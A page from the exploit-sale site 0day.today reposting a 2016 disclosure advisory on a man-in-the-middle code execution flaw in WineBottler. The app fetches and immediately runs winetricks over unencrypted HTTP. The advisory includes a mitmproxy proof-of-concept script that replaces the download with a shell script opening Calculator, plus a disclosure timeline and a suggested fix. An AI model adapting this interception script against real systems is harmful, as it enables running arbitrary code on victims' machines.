0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

WineBottler 1.8-rc4 Man-In-The-Middle / Code Execution Vulnerability

Author

Florian Bogner

Risk

[

Security Risk Critical

]

0day-ID

Category

Date add

Platform

Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles

Metadata
===================================================
Release Date: 17-10-2016
Author: Florian Bogner // Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected product: WineBottler (http://winebottler.kronenberg.org/)
Affected versions: up to the still current version 1.8-rc4
Tested on: OS X El Capitan 10.11.6
CVE : product not covered
URL: https://bogner.sh/2016/10/man-in-the-middle-remote-code-execution-vulnerability-in-winebottler-and-its-bundles/
Video: https://youtu.be/nwcZIn2s6Vc
Vulnerability Status: No patch available - Developer became unresponsive after promising to fix the issue

Product Description
===================================================
WineBottler packages Windows-based programs like browsers, media-players, games or business applications snugly into Mac app-bundles.

Vulnerability Description
===================================================
Whenever WineBottler is launched it tries to update the bundled winetricks (https://github.com/Winetricks/winetricks) library. However, as this update is carried out over unencrypted HTTP an attacker with man-in-the-middle capabilities can replace the downloaded winetricks.sh shell script. As the script is also launched immediately after downloading, this is a reliable man in the middle remote code execution vulnerability.

The issue also affects all the bundles created with WineBottler. However, I think it can only be abused on their first launch. This greatly limits the attack surfe.

PoC
===================================================
1.) Setup an HTTP proxy like Burp (https://portswigger.net/burp/)
2.) Redirect all HTTP traffic to this proxy
3.) Launch WineBottler
4.) Modify the request to http://winetricks.org/winetricks so that it returns a valid shell script.
5.) Remote code execution has been gained!

The following mitmproxy (https://mitmproxy.org/index.html) script "drunken-winebottler.py" can be used to automate the attack:
from mitmproxy.models import decoded

NEWLINE = '\r\n'

def response(context, flow):
    if flow.request.url == "http://winetricks.org/winetricks" and flow.response.status_code == 301 and flow.request.method=="GET":
        flow.response.status_code=200 # overwrite 301 status code to 200

        with decoded(flow.response):  # automatically decode gzipped responses.
            flow.response.content =  "" # replace original script to launch Calculator.app
            flow.response.content += '#!/bin/sh'+NEWLINE
            flow.response.content += '/usr/bin/open /Applications/Calculator.app'

Disclosure Timeline
===================================================
29.5.2016: The issue has been discovered
30.5.2016: Tried to establish initial contact with the developer using Facebook
31.5.2016: Requested CVE number; Retried to contact developer using Facebook
1.6.2016: MITRE declined CVE: The product is not covered.
2.6.2016: Created this documentation; Sent to developer using mail
18.6.2016: Developer responded on Facebook
20.6.2016: Developer promised that Winetricks update will be switched to HTTPS. Agreed on the 29.7. for the public disclosure
25.7.2016: Tried to contact developer as no new version has been released a no success
29.7.2016: Initially agreed public disclosure date a rescheduled
31.7.2016: Tried again to contact developer a again no success.
13.8.2016: Tried a last time to get in touch with the developer a again no success
17.10.2016: Public disclosure altough unfixed: Developer unresponsive since several month

Suggested Solution
===================================================
All request should be carried out over encrypted communication channels like HTTPS. The author already mentioned (https://mike.kronenberg.org/winebottler-1-7-52/) that he is planing to do so in the future. Yet, right now there is no patch available.

The only workaround would be to block outgoing (HTTP) connections - However, whenever I tried that WineBottler stalled...

#  0day.today [2024-11-14]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

WineBottler 1.8-rc4 Man-In-The-Middle / Code Execution Vulnerability

Report Error

Report Error